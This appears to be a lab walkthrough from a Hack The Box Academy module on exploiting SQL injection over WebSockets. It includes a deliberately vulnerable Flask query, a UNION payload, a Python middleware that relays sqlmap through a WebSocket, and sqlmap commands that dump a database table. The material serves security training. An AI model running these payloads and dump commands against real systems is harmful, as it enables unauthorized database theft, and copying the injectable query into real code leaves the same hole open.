SQLi via WebSockets

Inserting unsanitized user input from WebSocket connections into SQL queries can lead to SQL injection vulnerabilities. However, due to the lack of WebSocket support in many exploitation tools, abusing WebSocket SQLi can be more challenging.

Code Review - Identifying the Vulnerability

Application Overview

Web application displays messages for a given username via WebSocket connection.

Backend Analysis (server.py)

@sock.route('/dbconnector')
def dbconnector(sock):
    while True:
        response = {}
        try:
            data = sock.receive(timeout=1)
            if not data:
                continue
            
            username = json.loads(data).get('username', '')
            response["username"] = username
            messages = query(username)
            if not messages:
                response['error'] = "No messages for this user!"
            else:  
                response['messages'] = [msg[0] for msg in messages]
            sock.send(json.dumps(response))
        except Exception as e:
            response['error'] = "An error occured!"
            sock.send(json.dumps(response))

Vulnerable Query Function

def query(username):
    mydb = mysql.connector.connect(
        host="127.0.0.1",
        user="db",
        password="db-password",
        database="db"
    )
    mycursor = mydb.cursor()
    mycursor.execute(f'SELECT message FROM users WHERE username="{username}"')
    return mycursor.fetchall()

Vulnerability: Username directly interpolated into SQL query → SQLi!

Local Testing

Setup MySQL Docker

docker run -p 3306:3306 \
  -e MYSQL_USER='db' \
  -e MYSQL_PASSWORD='db-password' \
  -e MYSQL_DATABASE='db' \
  -e MYSQL_ROOT_PASSWORD='db' \
  mysql

Confirm SQLi

Use UNION-based payload as username:

" UNION SELECT "1

Result: 1 displayed → SQLi confirmed!

Exploitation with sqlmap

The Problem

sqlmap struggles with WebSocket connections directly.

Solution: HTTP-to-WebSocket Middleware

Create a Flask middleware that:

Receives SQLi payload from sqlmap via HTTP
Opens WebSocket connection to target
Forwards payload via WebSocket
Returns response to sqlmap

Middleware Code

from flask import Flask, request
from websocket import create_connection
import json

app = Flask(__name__)
WS_URL = 'ws://TARGET_IP/dbconnector'

@app.route('/')
def index():
    req = {}
    req['username'] = request.args.get('username', '')
    ws = create_connection(WS_URL)
    ws.send(json.dumps(req))
    r = json.loads(ws.recv())
    ws.close()
    if r.get('error'):
        return r['error']
    return r['messages']

app.run(host='127.0.0.1', port=8000)

Install Dependencies

pip install Flask websocket-client

Run Middleware

python3 sqlmapMiddleware.py

Run sqlmap

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt

Results:

sqlmap identified the following injection point(s):
---
Parameter: username (GET)
    Type: boolean-based blind
    Payload: username=htb-stdnt' AND 1426=1426 AND 'pYBp'='pYBp

    Type: time-based blind
    Payload: username=htb-stdnt' AND (SELECT 4655 FROM (SELECT(SLEEP(5)))yezp) AND 'EeMR'='EeMR

    Type: UNION query
    Payload: username=htb-stdnt' UNION ALL SELECT CONCAT(0x7171626a71,...,0x7178627071)-- -
---
back-end DBMS: MySQL >= 5.0.12

Question Walkthrough

Task: Exploit SQLi vulnerability to exfiltrate the flag from the database.

Step 1: Analyze Source Code

wget https://academy.hackthebox.com/storage/modules/231/src_websocket_sqli.zip
unzip src_websocket_sqli.zip

Vulnerable line in server.py:

mycursor.execute(f'SELECT message FROM users WHERE username="{username}"')

Step 2: Create Middleware

Save middleware code to sqlmapMiddleware.py (replace STMIP with target IP):

WS_URL = 'ws://<TARGET_IP>/dbconnector'

Step 3: Run Middleware

python3 sqlmapMiddleware.py

Step 4: Confirm SQLi

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --batch --threads=10

Step 5: Enumerate Databases

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --dbs --threads=10

available databases [3]:
[*] db
[*] information_schema
[*] performance_schema

Step 6: Enumerate Tables

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' --tables -D db --threads=10

Database: db
[2 tables]
+------------+
| secretdata |
| users      |
+------------+

Step 7: Dump Flag

sqlmap -u http://127.0.0.1:8000/?username=htb-stdnt --prefix='"' -T secretdata --dump --threads=10

Flag retrieved from secretdata table!

Summary

┌─────────────────────────────────────────────────────────────────────────┐
│                   WebSocket SQLi via Middleware                         │
├─────────────────────────────────────────────────────────────────────────┤
│                                                                         │
│  sqlmap ──HTTP──→ Middleware ──WebSocket──→ Vulnerable App              │
│    │                  │                          │                      │
│    │  ?username=      │  {"username": "..."}     │  SQL Query           │
│    │  payload         │                          │                      │
│    │                  │                          │                      │
│    │←── Response ─────│←─── JSON Response ───────│                      │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

Key Points

WebSocket SQLi exploitable like HTTP SQLi
Use middleware to bridge sqlmap → WebSocket
--prefix='"' may be needed for proper injection
Same technique applies to other vulns (Command Injection, LFI)

PreviousXSS via WebSockets NextCSWH

Last updated 1 month ago

hashtagCode Review - Identifying the Vulnerability

hashtagApplication Overview

hashtagBackend Analysis (server.py)

hashtagVulnerable Query Function

hashtagLocal Testing

hashtagSetup MySQL Docker

hashtagConfirm SQLi

hashtagExploitation with sqlmap

hashtagThe Problem

hashtagSolution: HTTP-to-WebSocket Middleware

hashtagMiddleware Code

hashtagInstall Dependencies

hashtagRun Middleware

hashtagRun sqlmap

hashtagQuestion Walkthrough

hashtagStep 1: Analyze Source Code

hashtagStep 2: Create Middleware

hashtagStep 3: Run Middleware

hashtagStep 4: Confirm SQLi

hashtagStep 5: Enumerate Databases

hashtagStep 6: Enumerate Tables

hashtagStep 7: Dump Flag

hashtagSummary

hashtagKey Points